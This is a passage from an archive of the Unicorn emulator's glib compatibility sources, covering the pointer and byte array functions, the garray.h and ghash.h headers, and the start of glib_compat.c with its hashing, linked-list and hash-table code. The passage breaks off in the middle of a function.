* #GDestroyNotify function it is called for the removed element. If so, the * return value from this function will potentially point to freed memory * (depending on the #GDestroyNotify implementation). * * Returns: (nullable): the pointer which was removed */ gpointer g_ptr_array_remove_index_fast (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, TRUE, TRUE); } /** * g_ptr_array_steal_index: * @array: a #GPtrArray * @index_: the index of the pointer to steal * * Removes the pointer at the given index from the pointer array. * The following elements are moved down one place. The #GDestroyNotify for * @array is *not* called on the removed element; ownership is transferred to * the caller of this function. * * Returns: (transfer full) (nullable): the pointer which was removed * Since: 2.58 */ gpointer g_ptr_array_steal_index (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, FALSE, FALSE); } /** * g_ptr_array_steal_index_fast: * @array: a #GPtrArray * @index_: the index of the pointer to steal * * Removes the pointer at the given index from the pointer array. * The last element in the array is used to fill in the space, so * this function does not preserve the order of the array. But it * is faster than g_ptr_array_steal_index(). The #GDestroyNotify for @array is * *not* called on the removed element; ownership is transferred to the caller * of this function. * * Returns: (transfer full) (nullable): the pointer which was removed * Since: 2.58 */ gpointer g_ptr_array_steal_index_fast (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, TRUE, FALSE); } /** * g_ptr_array_remove_range: * @array: a @GPtrArray * @index_: the index of the first pointer to remove * @length: the number of pointers to remove * * Removes the given number of pointers starting at the given index * from a #GPtrArray. The following elements are moved to close the * gap. If @array has a non-%NULL #GDestroyNotify function it is * called for the removed elements. * * Returns: the @array * * Since: 2.4 */ GPtrArray* g_ptr_array_remove_range (GPtrArray *array, guint index_, guint length) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint n; g_return_val_if_fail (rarray != NULL, NULL); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), NULL); g_return_val_if_fail (index_ <= rarray->len, NULL); g_return_val_if_fail (index_ + length <= rarray->len, NULL); if (rarray->element_free_func != NULL) { for (n = index_; n < index_ + length; n++) rarray->element_free_func (rarray->pdata[n]); } if (index_ + length != rarray->len) { memmove (&rarray->pdata[index_], &rarray->pdata[index_ + length], (rarray->len - (index_ + length)) * sizeof (gpointer)); } rarray->len -= length; if (g_mem_gc_friendly) { guint i; for (i = 0; i < length; i++) rarray->pdata[rarray->len + i] = NULL; } return array; } /** * g_ptr_array_remove: * @array: a #GPtrArray * @data: the pointer to remove * * Removes the first occurrence of the given pointer from the pointer * array. The following elements are moved down one place. If @array * has a non-%NULL #GDestroyNotify function it is called for the * removed element. * * It returns %TRUE if the pointer was removed, or %FALSE if the * pointer was not found. * * Returns: %TRUE if the pointer is removed, %FALSE if the pointer * is not found in the array */ gboolean g_ptr_array_remove (GPtrArray *array, gpointer data) { guint i; g_return_val_if_fail (array, FALSE); g_return_val_if_fail (array->len == 0 || (array->len != 0 && array->pdata != NULL), FALSE); for (i = 0; i < array->len; i += 1) { if (array->pdata[i] == data) { g_ptr_array_remove_index (array, i); return TRUE; } } return FALSE; } /** * g_ptr_array_remove_fast: * @array: a #GPtrArray * @data: the pointer to remove * * Removes the first occurrence of the given pointer from the pointer * array. The last element in the array is used to fill in the space, * so this function does not preserve the order of the array. But it * is faster than g_ptr_array_remove(). If @array has a non-%NULL * #GDestroyNotify function it is called for the removed element. * * It returns %TRUE if the pointer was removed, or %FALSE if the * pointer was not found. * * Returns: %TRUE if the pointer was found in the array */ gboolean g_ptr_array_remove_fast (GPtrArray *array, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint i; g_return_val_if_fail (rarray, FALSE); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), FALSE); for (i = 0; i < rarray->len; i += 1) { if (rarray->pdata[i] == data) { g_ptr_array_remove_index_fast (array, i); return TRUE; } } return FALSE; } /** * g_ptr_array_add: * @array: a #GPtrArray * @data: the pointer to add * * Adds a pointer to the end of the pointer array. The array will grow * in size automatically if necessary. */ void g_ptr_array_add (GPtrArray *array, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (rarray); g_return_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL)); g_ptr_array_maybe_expand (rarray, 1); rarray->pdata[rarray->len++] = data; } /** * g_ptr_array_extend: * @array_to_extend: a #GPtrArray. * @array: (transfer none): a #GPtrArray to add to the end of @array_to_extend. * @func: (nullable): a copy function used to copy every element in the array * @user_data: user data passed to the copy function @func, or %NULL * * Adds all pointers of @array to the end of the array @array_to_extend. * The array will grow in size automatically if needed. @array_to_extend is * modified in-place. * * @func, as a #GCopyFunc, takes two arguments, the data to be copied * and a @user_data pointer. On common processor architectures, it's safe to * pass %NULL as @user_data if the copy function takes only one argument. You * may get compiler warnings from this though if compiling with GCC's * `-Wcast-function-type` warning. * * If @func is %NULL, then only the pointers (and not what they are * pointing to) are copied to the new #GPtrArray. * * Since: 2.62 **/ void g_ptr_array_extend (GPtrArray *array_to_extend, GPtrArray *array, GCopyFunc func, gpointer user_data) { GRealPtrArray *rarray_to_extend = (GRealPtrArray *) array_to_extend; gsize i; g_return_if_fail (array_to_extend != NULL); g_return_if_fail (array != NULL); g_ptr_array_maybe_expand (rarray_to_extend, array->len); if (func != NULL) { for (i = 0; i < array->len; i++) rarray_to_extend->pdata[i + rarray_to_extend->len] = func (array->pdata[i], user_data); } else if (array->len > 0) { memcpy (rarray_to_extend->pdata + rarray_to_extend->len, array->pdata, array->len * sizeof (*array->pdata)); } rarray_to_extend->len += array->len; } /** * g_ptr_array_insert: * @array: a #GPtrArray * @index_: the index to place the new element at, or -1 to append * @data: the pointer to add. * * Inserts an element into the pointer array at the given index. The * array will grow in size automatically if necessary. * * Since: 2.40 */ void g_ptr_array_insert (GPtrArray *array, gint index_, gpointer data) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (rarray); g_return_if_fail (index_ >= -1); g_return_if_fail (index_ <= (gint)rarray->len); g_ptr_array_maybe_expand (rarray, 1); if (index_ < 0) index_ = rarray->len; if ((guint) index_ < rarray->len) memmove (&(rarray->pdata[index_ + 1]), &(rarray->pdata[index_]), (rarray->len - index_) * sizeof (gpointer)); rarray->len++; rarray->pdata[index_] = data; } /** * g_ptr_array_foreach: * @array: a #GPtrArray * @func: the function to call for each array element * @user_data: user data to pass to the function * * Calls a function for each element of a #GPtrArray. @func must not * add elements to or remove elements from the array. * * Since: 2.4 */ void g_ptr_array_foreach (GPtrArray *array, GFunc func, gpointer user_data) { guint i; g_return_if_fail (array); for (i = 0; i < array->len; i++) (*func) (array->pdata[i], user_data); } /** * SECTION:arrays_byte * @title: Byte Arrays * @short_description: arrays of bytes * * #GByteArray is a mutable array of bytes based on #GArray, to provide arrays * of bytes which grow automatically as elements are added. * * To create a new #GByteArray use g_byte_array_new(). To add elements to a * #GByteArray, use g_byte_array_append(), and g_byte_array_prepend(). * * To set the size of a #GByteArray, use g_byte_array_set_size(). * * To free a #GByteArray, use g_byte_array_free(). * * An example for using a #GByteArray: * |[<!-- language="C" --> * GByteArray *gbarray; * gint i; * * gbarray = g_byte_array_new (); * for (i = 0; i < 10000; i++) * g_byte_array_append (gbarray, (guint8*) "abcd", 4); * * for (i = 0; i < 10000; i++) * { * g_assert (gbarray->data[4*i] == 'a'); * g_assert (gbarray->data[4*i+1] == 'b'); * g_assert (gbarray->data[4*i+2] == 'c'); * g_assert (gbarray->data[4*i+3] == 'd'); * } * * g_byte_array_free (gbarray, TRUE); * ]| * * See #GBytes if you are interested in an immutable object representing a * sequence of bytes. */ /** * GByteArray: * @data: a pointer to the element data. The data may be moved as * elements are added to the #GByteArray * @len: the number of elements in the #GByteArray * * Contains the public fields of a GByteArray. */ /** * g_byte_array_new: * * Creates a new #GByteArray with a reference count of 1. * * Returns: (transfer full): the new #GByteArray */ GByteArray *g_byte_array_new (void) { return (GByteArray *)g_array_sized_new (FALSE, FALSE, 1, 0); } /** * g_byte_array_sized_new: * @reserved_size: number of bytes preallocated * * Creates a new #GByteArray with @reserved_size bytes preallocated. * This avoids frequent reallocation, if you are going to add many * bytes to the array. Note however that the size of the array is still * 0. * * Returns: the new #GByteArray */ GByteArray* g_byte_array_sized_new (guint reserved_size) { return (GByteArray *)g_array_sized_new (FALSE, FALSE, 1, reserved_size); } /** * g_byte_array_free: * @array: a #GByteArray * @free_segment: if %TRUE the actual byte data is freed as well * * Frees the memory allocated by the #GByteArray. If @free_segment is * %TRUE it frees the actual byte data. If the reference count of * @array is greater than one, the #GByteArray wrapper is preserved but * the size of @array will be set to zero. * * Returns: the element data if @free_segment is %FALSE, otherwise * %NULL. The element data should be freed using g_free(). */ guint8* g_byte_array_free (GByteArray *array, gboolean free_segment) { return (guint8 *)g_array_free ((GArray *)array, free_segment); } /** * g_byte_array_append: * @array: a #GByteArray * @data: the byte data to be added * @len: the number of bytes to add * * Adds the given bytes to the end of the #GByteArray. * The array will grow in size automatically if necessary. * * Returns: the #GByteArray */ GByteArray* g_byte_array_append (GByteArray *array, const guint8 *data, guint len) { g_array_append_vals ((GArray *)array, (guint8 *)data, len); return array; } /** * g_byte_array_prepend: * @array: a #GByteArray * @data: the byte data to be added * @len: the number of bytes to add * * Adds the given data to the start of the #GByteArray. * The array will grow in size automatically if necessary. * * Returns: the #GByteArray */ GByteArray *g_byte_array_prepend (GByteArray *array, const guint8 *data, guint len) { g_array_prepend_vals ((GArray *)array, (guint8 *)data, len); return array; } /** * g_byte_array_set_size: * @array: a #GByteArray * @length: the new size of the #GByteArray * * Sets the size of the #GByteArray, expanding it if necessary. * * Returns: the #GByteArray */ GByteArray *g_byte_array_set_size (GByteArray *array, guint length) { g_array_set_size ((GArray *)array, length); return array; } ���������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/garray.h������������������������������������������������������������������0000664�0000000�0000000�00000006461�14675241067�0017131�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_ARRAY_H__ #define __G_ARRAY_H__ #include "gtypes.h" typedef struct _GBytes GBytes; typedef struct _GArray GArray; typedef struct _GByteArray GByteArray; typedef struct _GPtrArray GPtrArray; struct _GArray { gchar *data; guint len; }; struct _GByteArray { guint8 *data; guint len; }; struct _GPtrArray { gpointer *pdata; guint len; }; /* Resizable arrays. remove fills any cleared spot and shortens the * array, while preserving the order. remove_fast will distort the * order by moving the last element to the position of the removed. */ #define g_array_append_val(a,v) g_array_append_vals (a, &(v), 1) #define g_array_index(a,t,i) (((t*) (void *) (a)->data) [(i)]) GArray* g_array_append_vals (GArray *array, gconstpointer data, guint len); GArray* g_array_new (gboolean zero_terminated, gboolean clear_, guint element_size); GArray* g_array_sized_new (gboolean zero_terminated, gboolean clear_, guint element_size, guint reserved_size); gchar* g_array_free(GArray *array, gboolean free_segment); GArray* g_array_set_size(GArray *array, guint length); GArray* g_array_remove_range (GArray *farray, guint index_, guint length); void g_ptr_array_set_free_func (GPtrArray *array, GDestroyNotify element_free_func); /* Resizable pointer array. This interface is much less complicated * than the above. Add appends a pointer. Remove fills any cleared * spot and shortens the array. remove_fast will again distort order. */ #define g_ptr_array_index(array,index_) ((array)->pdata)[index_] GPtrArray* g_ptr_array_new_with_free_func (GDestroyNotify element_free_func); void g_ptr_array_add(GPtrArray *array, gpointer data); GPtrArray* g_ptr_array_sized_new (guint reserved_size); GPtrArray* g_ptr_array_remove_range (GPtrArray *array, guint index_, guint length); /* Byte arrays, an array of guint8. Implemented as a GArray, * but type-safe. */ GByteArray* g_byte_array_sized_new(guint reserved_size); guint8* g_byte_array_free(GByteArray *array, gboolean free_segment); GByteArray* g_byte_array_append(GByteArray *array, const guint8 *data, guint len); GByteArray* g_byte_array_set_size(GByteArray *array, guint length); #endif /* __G_ARRAY_H__ */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/ghash.h�������������������������������������������������������������������0000664�0000000�0000000�00000004740�14675241067�0016734�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_HASH_H__ #define __G_HASH_H__ #include "gtypes.h" typedef struct _GHashTable GHashTable; typedef gboolean (*GHRFunc) (gpointer key, gpointer value, gpointer user_data); struct _GHashTableIter { /*< private >*/ gpointer dummy1; gpointer dummy2; gpointer dummy3; int dummy4; gboolean dummy5; gpointer dummy6; }; GHashTable* g_hash_table_new (GHashFunc hash_func, GEqualFunc key_equal_func); GHashTable* g_hash_table_new_full (GHashFunc hash_func, GEqualFunc key_equal_func, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func); void g_hash_table_destroy (GHashTable *hash_table); gboolean g_hash_table_insert (GHashTable *hash_table, gpointer key, gpointer value); void g_hash_table_replace (GHashTable *hash_table, gpointer key, gpointer value); gboolean g_hash_table_remove (GHashTable *hash_table, gconstpointer key); void g_hash_table_remove_all (GHashTable *hash_table); gpointer g_hash_table_lookup (GHashTable *hash_table, gconstpointer key); void g_hash_table_foreach (GHashTable *hash_table, GHFunc func, gpointer user_data); guint g_hash_table_size (GHashTable *hash_table); GHashTable* g_hash_table_ref (GHashTable *hash_table); void g_hash_table_unref (GHashTable *hash_table); /* Hash Functions */ gboolean g_int_equal (gconstpointer v1, gconstpointer v2); guint g_int_hash (gconstpointer v); #endif /* __G_HASH_H__ */ ��������������������������������unicorn-2.1.1/glib_compat/glib_compat.c�������������������������������������������������������������0000664�0000000�0000000�00000116140�14675241067�0020113�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* glib_compat.c replacement functionality for glib code used in qemu Copyright (C) 2016 Chris Eagle cseagle at gmail dot com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ // Part of this code was lifted from glib-2.28.0. // Glib license is available in COPYING_GLIB file in root directory. #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <string.h> #include <stdlib.h> #include <stdio.h> #include <limits.h> #include "glib_compat.h" #ifndef _WIN64 #define GPOINTER_TO_UINT(p) ((guint)(uintptr_t)(p)) #else #define GPOINTER_TO_UINT(p) ((guint) (guint64) (p)) #endif /* All functions below added to eliminate GLIB dependency */ /* hashing and equality functions */ // Hash functions lifted glib-2.28.0/glib/ghash.c /** * g_direct_hash: * @v: a #gpointer key * * Converts a gpointer to a hash value. * It can be passed to g_hash_table_new() as the @hash_func parameter, * when using pointers as keys in a #GHashTable. * * Returns: a hash value corresponding to the key. */ static guint g_direct_hash (gconstpointer v) { return GPOINTER_TO_UINT (v); } // g_str_hash() is lifted glib-2.28.0/glib/gstring.c /** * g_str_hash: * @v: a string key * * Converts a string to a hash value. * * This function implements the widely used "djb" hash apparently posted * by Daniel Bernstein to comp.lang.c some time ago. The 32 bit * unsigned hash value starts at 5381 and for each byte 'c' in the * string, is updated: <literal>hash = hash * 33 + c</literal>. This * function uses the signed value of each byte. * * It can be passed to g_hash_table_new() as the @hash_func parameter, * when using strings as keys in a #GHashTable. * * Returns: a hash value corresponding to the key **/ guint g_str_hash (gconstpointer v) { const signed char *p; guint32 h = 5381; for (p = v; *p != '\0'; p++) h = (h << 5) + h + *p; return h; } gboolean g_str_equal(gconstpointer v1, gconstpointer v2) { return strcmp((const char*)v1, (const char*)v2) == 0; } // g_int_hash() is lifted from glib-2.28.0/glib/gutils.c /** * g_int_hash: * @v: a pointer to a #gint key * * Converts a pointer to a #gint to a hash value. * It can be passed to g_hash_table_new() as the @hash_func parameter, * when using pointers to integers values as keys in a #GHashTable. * * Returns: a hash value corresponding to the key. */ guint g_int_hash (gconstpointer v) { return *(const gint*) v; } gboolean g_int_equal(gconstpointer v1, gconstpointer v2) { return *((const gint*)v1) == *((const gint*)v2); } /* Doubly-linked list */ GList *g_list_first(GList *list) { if (list == NULL) return NULL; while (list->prev) list = list->prev; return list; } void g_list_foreach(GList *list, GFunc func, gpointer user_data) { GList *lp; for (lp = list; lp; lp = lp->next) { (*func)(lp->data, user_data); } } void g_list_free(GList *list) { GList *lp, *next, *prev = NULL; if (list) prev = list->prev; for (lp = list; lp; lp = next) { next = lp->next; free(lp); } for (lp = prev; lp; lp = prev) { prev = lp->prev; free(lp); } } GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare) { GList *i; GList *n = (GList*)g_malloc(sizeof(GList)); n->data = data; if (list == NULL) { n->next = n->prev = NULL; return n; } for (i = list; i; i = i->next) { n->prev = i->prev; if ((*compare)(data, i->data) <= 0) { n->next = i; i->prev = n; if (i == list) return n; else return list; } } n->prev = n->prev->next; n->next = NULL; n->prev->next = n; return list; } GList *g_list_prepend(GList *list, gpointer data) { GList *n = (GList*)g_malloc(sizeof(GList)); n->next = list; n->prev = NULL; n->data = data; return n; } GList *g_list_remove_link(GList *list, GList *llink) { if (llink) { if (llink == list) list = list->next; if (llink->prev) llink->prev->next = llink->next; if (llink->next) llink->next->prev = llink->prev; } return list; } // code copied from glib/glist.c, version 2.28.0 static GList *g_list_sort_merge(GList *l1, GList *l2, GFunc compare_func, gpointer user_data) { GList list, *l, *lprev; gint cmp; l = &list; lprev = NULL; while (l1 && l2) { cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); if (cmp <= 0) { l->next = l1; l1 = l1->next; } else { l->next = l2; l2 = l2->next; } l = l->next; l->prev = lprev; lprev = l; } l->next = l1 ? l1 : l2; l->next->prev = l; return list.next; } static GList *g_list_sort_real(GList *list, GFunc compare_func, gpointer user_data) { GList *l1, *l2; if (!list) return NULL; if (!list->next) return list; l1 = list; l2 = list->next; while ((l2 = l2->next) != NULL) { if ((l2 = l2->next) == NULL) break; l1 = l1->next; } l2 = l1->next; l1->next = NULL; return g_list_sort_merge (g_list_sort_real (list, compare_func, user_data), g_list_sort_real (l2, compare_func, user_data), compare_func, user_data); } /** * g_list_sort: * @list: a #GList * @compare_func: the comparison function used to sort the #GList. * This function is passed the data from 2 elements of the #GList * and should return 0 if they are equal, a negative value if the * first element comes before the second, or a positive value if * the first element comes after the second. * * Sorts a #GList using the given comparison function. * * Returns: the start of the sorted #GList */ /** * GCompareFunc: * @a: a value. * @b: a value to compare with. * @Returns: negative value if @a < @b; zero if @a = @b; positive * value if @a > @b. * * Specifies the type of a comparison function used to compare two * values. The function should return a negative integer if the first * value comes before the second, 0 if they are equal, or a positive * integer if the first value comes after the second. **/ GList *g_list_sort (GList *list, GCompareFunc compare_func) { return g_list_sort_real (list, (GFunc) compare_func, NULL); } /* END of g_list related functions */ /* Singly-linked list */ GSList *g_slist_append(GSList *list, gpointer data) { GSList *head = list; if (list) { while (list->next) list = list->next; list->next = (GSList*)g_malloc(sizeof(GSList)); list = list->next; } else { head = list = (GSList*)g_malloc(sizeof(GSList)); } list->data = data; list->next = NULL; return head; } void g_slist_foreach(GSList *list, GFunc func, gpointer user_data) { GSList *lp; for (lp = list; lp; lp = lp->next) { (*func)(lp->data, user_data); } } void g_slist_free(GSList *list) { GSList *lp, *next; for (lp = list; lp; lp = next) { next = lp->next; free(lp); } } GSList *g_slist_prepend(GSList *list, gpointer data) { GSList *head = (GSList*)g_malloc(sizeof(GSList)); head->next = list; head->data = data; return head; } static GSList *g_slist_sort_merge (GSList *l1, GSList *l2, GFunc compare_func, gpointer user_data) { GSList list, *l; gint cmp; l=&list; while (l1 && l2) { cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); if (cmp <= 0) { l=l->next=l1; l1=l1->next; } else { l=l->next=l2; l2=l2->next; } } l->next= l1 ? l1 : l2; return list.next; } static GSList *g_slist_sort_real (GSList *list, GFunc compare_func, gpointer user_data) { GSList *l1, *l2; if (!list) return NULL; if (!list->next) return list; l1 = list; l2 = list->next; while ((l2 = l2->next) != NULL) { if ((l2 = l2->next) == NULL) break; l1=l1->next; } l2 = l1->next; l1->next = NULL; return g_slist_sort_merge (g_slist_sort_real (list, compare_func, user_data), g_slist_sort_real (l2, compare_func, user_data), compare_func, user_data); } /** * g_slist_sort: * @list: a #GSList * @compare_func: the comparison function used to sort the #GSList. * This function is passed the data from 2 elements of the #GSList * and should return 0 if they are equal, a negative value if the * first element comes before the second, or a positive value if * the first element comes after the second. * * Sorts a #GSList using the given comparison function. * * Returns: the start of the sorted #GSList */ GSList *g_slist_sort (GSList *list, GCompareFunc compare_func) { return g_slist_sort_real (list, (GFunc) compare_func, NULL); } /* END of g_slist related functions */ // Hash functions lifted glib-2.28.0/glib/ghash.c #define HASH_TABLE_MIN_SHIFT 3 /* 1 << 3 == 8 buckets */ typedef struct _GHashNode GHashNode; struct _GHashNode { gpointer key; gpointer value; /* If key_hash == 0, node is not in use * If key_hash == 1, node is a tombstone * If key_hash >= 2, node contains data */ guint key_hash; }; struct _GHashTable { gint size; gint mod; guint mask; gint nnodes; gint noccupied; /* nnodes + tombstones */ GHashNode *nodes; GHashFunc hash_func; GEqualFunc key_equal_func; volatile gint ref_count; GDestroyNotify key_destroy_func; GDestroyNotify value_destroy_func; }; /** * g_hash_table_destroy: * @hash_table: a #GHashTable. * * Destroys all keys and values in the #GHashTable and decrements its * reference count by 1. If keys and/or values are dynamically allocated, * you should either free them first or create the #GHashTable with destroy * notifiers using g_hash_table_new_full(). In the latter case the destroy * functions you supplied will be called on all keys and values during the * destruction phase. **/ void g_hash_table_destroy (GHashTable *hash_table) { if (hash_table == NULL) return; if (hash_table->ref_count == 0) return; g_hash_table_remove_all (hash_table); g_hash_table_unref (hash_table); } /** * g_hash_table_find: * @hash_table: a #GHashTable. * @predicate: function to test the key/value pairs for a certain property. * @user_data: user data to pass to the function. * * Calls the given function for key/value pairs in the #GHashTable until * @predicate returns %TRUE. The function is passed the key and value of * each pair, and the given @user_data parameter. The hash table may not * be modified while iterating over it (you can't add/remove items). * * Note, that hash tables are really only optimized for forward lookups, * i.e. g_hash_table_lookup(). * So code that frequently issues g_hash_table_find() or * g_hash_table_foreach() (e.g. in the order of once per every entry in a * hash table) should probably be reworked to use additional or different * data structures for reverse lookups (keep in mind that an O(n) find/foreach * operation issued for all n values in a hash table ends up needing O(n*n) * operations). * * Return value: The value of the first key/value pair is returned, for which * func evaluates to %TRUE. If no pair with the requested property is found, * %NULL is returned. * * Since: 2.4 **/ gpointer g_hash_table_find (GHashTable *hash_table, GHRFunc predicate, gpointer user_data) { gint i; if (hash_table == NULL) return NULL; if (predicate == NULL) return NULL; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1 && predicate (node->key, node->value, user_data)) return node->value; } return NULL; } /** * g_hash_table_foreach: * @hash_table: a #GHashTable. * @func: the function to call for each key/value pair. * @user_data: user data to pass to the function. * * Calls the given function for each of the key/value pairs in the * #GHashTable. The function is passed the key and value of each * pair, and the given @user_data parameter. The hash table may not * be modified while iterating over it (you can't add/remove * items). To remove all items matching a predicate, use * g_hash_table_foreach_remove(). * * See g_hash_table_find() for performance caveats for linear * order searches in contrast to g_hash_table_lookup(). **/ void g_hash_table_foreach (GHashTable *hash_table, GHFunc func, gpointer user_data) { gint i; if (hash_table == NULL) return; if (func == NULL) return; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1) (* func) (node->key, node->value, user_data); } } /* * g_hash_table_lookup_node_for_insertion: * @hash_table: our #GHashTable * @key: the key to lookup against * @hash_return: key hash return location * Return value: index of the described #GHashNode * * Performs a lookup in the hash table, preserving extra information * usually needed for insertion. * * This function first computes the hash value of the key using the * user's hash function. * * If an entry in the table matching @key is found then this function * returns the index of that entry in the table, and if not, the * index of an unused node (empty or tombstone) where the key can be * inserted. * * The computed hash value is returned in the variable pointed to * by @hash_return. This is to save insertions from having to compute * the hash record again for the new record. */ static inline guint g_hash_table_lookup_node_for_insertion (GHashTable *hash_table, gconstpointer key, guint *hash_return) { GHashNode *node; guint node_index; guint hash_value; guint first_tombstone = 0; gboolean have_tombstone = FALSE; guint step = 0; /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. * We need to make sure our hash value is not one of these. */ hash_value = (* hash_table->hash_func) (key); if (hash_value <= 1) hash_value = 2; *hash_return = hash_value; node_index = hash_value % hash_table->mod; node = &hash_table->nodes [node_index]; while (node->key_hash) { /* We first check if our full hash values * are equal so we can avoid calling the full-blown * key equality function in most cases. */ if (node->key_hash == hash_value) { if (hash_table->key_equal_func) { if (hash_table->key_equal_func (node->key, key)) return node_index; } else if (node->key == key) { return node_index; } } else if (node->key_hash == 1 && !have_tombstone) { first_tombstone = node_index; have_tombstone = TRUE; } step++; node_index += step; node_index &= hash_table->mask; node = &hash_table->nodes [node_index]; } if (have_tombstone) return first_tombstone; return node_index; } /* Each table size has an associated prime modulo (the first prime * lower than the table size) used to find the initial bucket. Probing * then works modulo 2^n. The prime modulo is necessary to get a * good distribution with poor hash functions. */ static const gint prime_mod [] = { 1, /* For 1 << 0 */ 2, 3, 7, 13, 31, 61, 127, 251, 509, 1021, 2039, 4093, 8191, 16381, 32749, 65521, /* For 1 << 16 */ 131071, 262139, 524287, 1048573, 2097143, 4194301, 8388593, 16777213, 33554393, 67108859, 134217689, 268435399, 536870909, 1073741789, 2147483647 /* For 1 << 31 */ }; static void g_hash_table_set_shift (GHashTable *hash_table, gint shift) { gint i; guint mask = 0; hash_table->size = 1 << shift; hash_table->mod = prime_mod [shift]; for (i = 0; i < shift; i++) { mask <<= 1; mask |= 1; } hash_table->mask = mask; } static gint g_hash_table_find_closest_shift (gint n) { gint i; for (i = 0; n; i++) n >>= 1; return i; } static void g_hash_table_set_shift_from_size (GHashTable *hash_table, gint size) { gint shift; shift = g_hash_table_find_closest_shift (size); shift = MAX (shift, HASH_TABLE_MIN_SHIFT); g_hash_table_set_shift (hash_table, shift); } /* * g_hash_table_resize: * @hash_table: our #GHashTable * * Resizes the hash table to the optimal size based on the number of * nodes currently held. If you call this function then a resize will * occur, even if one does not need to occur. Use * g_hash_table_maybe_resize() instead. * * This function may "resize" the hash table to its current size, with * the side effect of cleaning up tombstones and otherwise optimizing * the probe sequences. */ static void g_hash_table_resize (GHashTable *hash_table) { GHashNode *new_nodes; gint old_size; gint i; old_size = hash_table->size; g_hash_table_set_shift_from_size (hash_table, hash_table->nnodes * 2); new_nodes = g_new0 (GHashNode, hash_table->size); for (i = 0; i < old_size; i++) { GHashNode *node = &hash_table->nodes [i]; GHashNode *new_node; guint hash_val; guint step = 0; if (node->key_hash <= 1) continue; hash_val = node->key_hash % hash_table->mod; new_node = &new_nodes [hash_val]; while (new_node->key_hash) { step++; hash_val += step; hash_val &= hash_table->mask; new_node = &new_nodes [hash_val]; } *new_node = *node; } g_free (hash_table->nodes); hash_table->nodes = new_nodes; hash_table->noccupied = hash_table->nnodes; } /* * g_hash_table_maybe_resize: * @hash_table: our #GHashTable * * Resizes the hash table, if needed. * * Essentially, calls g_hash_table_resize() if the table has strayed * too far from its ideal size for its number of nodes. */ static inline void g_hash_table_maybe_resize (GHashTable *hash_table) { gint noccupied = hash_table->noccupied; gint size = hash_table->size; if ((size > hash_table->nnodes * 4 && size > 1 << HASH_TABLE_MIN_SHIFT) || (size <= noccupied + (noccupied / 16))) g_hash_table_resize (hash_table); } /* * g_hash_table_insert_internal: * @hash_table: our #GHashTable * @key: the key to insert * @value: the value to insert * @keep_new_key: if %TRUE and this key already exists in the table * then call the destroy notify function on the old key. If %FALSE * then call the destroy notify function on the new key. * * Implements the common logic for the g_hash_table_insert() and * g_hash_table_replace() functions. * * Do a lookup of @key. If it is found, replace it with the new * @value (and perhaps the new @key). If it is not found, create a * new node. */ static void g_hash_table_insert_internal (GHashTable *hash_table, gpointer key, gpointer value, gboolean keep_new_key) { GHashNode *node; guint node_index; guint key_hash; guint old_hash; if (hash_table == NULL) return; if (hash_table->ref_count == 0) return; 